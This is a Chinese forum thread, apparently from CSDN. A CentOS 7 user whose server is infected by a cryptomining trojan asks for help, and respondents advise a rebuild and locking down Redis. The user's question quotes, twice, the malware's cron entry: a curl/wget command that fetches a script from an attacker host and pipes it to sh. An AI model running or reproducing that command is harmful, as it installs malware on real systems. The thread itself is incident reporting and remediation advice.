centos7 中毒挖矿木马,找不到进程找不到脚本位置,求帮忙~
  1. top无占用大量CPU的进程,内存正常。
  2. 目前只有crontab相关文件里面存在脚本命令(如/var/spool/cron/root; /var/spool/cron/crontabs/root; /etc/crontab; /etc/cron.d/root; /etc/bashrc ) # */30 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
  3. crontab -l 查看有个定时任务,删不掉,2中的文件无法删除,即使删除也会再次生成。 # (*/15 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh)
  4. 按照定时任务crul网址打开的是个脚本: 图片说明
  5. 发现病毒文件/usr/bin/b1e06d5d739eeb,不知是什么文件,打开乱码,即使删除也会再次生成。
  6. 开机自启项有sshservice文件,改文件有配置指向/usr/bin/b1e06d5d739eeb

图片说明
8. 亡羊补牢,目前已经关闭redis,做了端口和IP限制,改了ssh端口和密码,停用了curl和wget命令,伪造假文件/usr/bin/b1e06d5d739eeb(伪造的文件一直为空),但是一直找不到该病毒的进程和脚本位置,希望大佬们帮忙分析~

2个回答

换机器吧,就算找到了,你确定你能删除干净吗?想找的话, 你看下你的ps ls find grep top这些命令是不是也是被污染了;把正常的进程全都停止,看下存在的活跃进程。

caozhy
贵阳老马马善福专业维修游泳池堵漏防水工程 回复weixin_45926390: 当然可以不用重新换系统,但是你得找一个专家帮你。你这种闲散人员就算了吧
9 个月之前 回复
weixin_44144932
rpmdeb 你想研究病毒的话,可以保留这个系统;你想尽快解决问题不影响业务的话,换机器换系统是最保险的。
9 个月之前 回复
weixin_45926390
weixin_45926390 类似clamav这种扫描病毒的软件似乎已经被劫持了,扫描一半就被kill掉了。网上教程使用busybox,我这就无法使用..真的只能重新部署系统了吗
9 个月之前 回复

隐藏的比较深,要清理干净很难,一般是有多个进程的,主进程隐藏的比较深,你可以查看进程中有些陌生或者奇怪的进程,一个个排除。
另外攻击者还有可能拿到了root权限了,最好是重置系统,重新设置密码。

redis不要用默认端口,同时要开启access auth;如果用到docker也一样。(血的教训 - -!)

这两个遇到的最多,一般这些攻击者都是扫描云服务器的这些端口并尝试入侵。

weixin_45926390
weixin_45926390 看来是只有重新部署系统了啊
9 个月之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问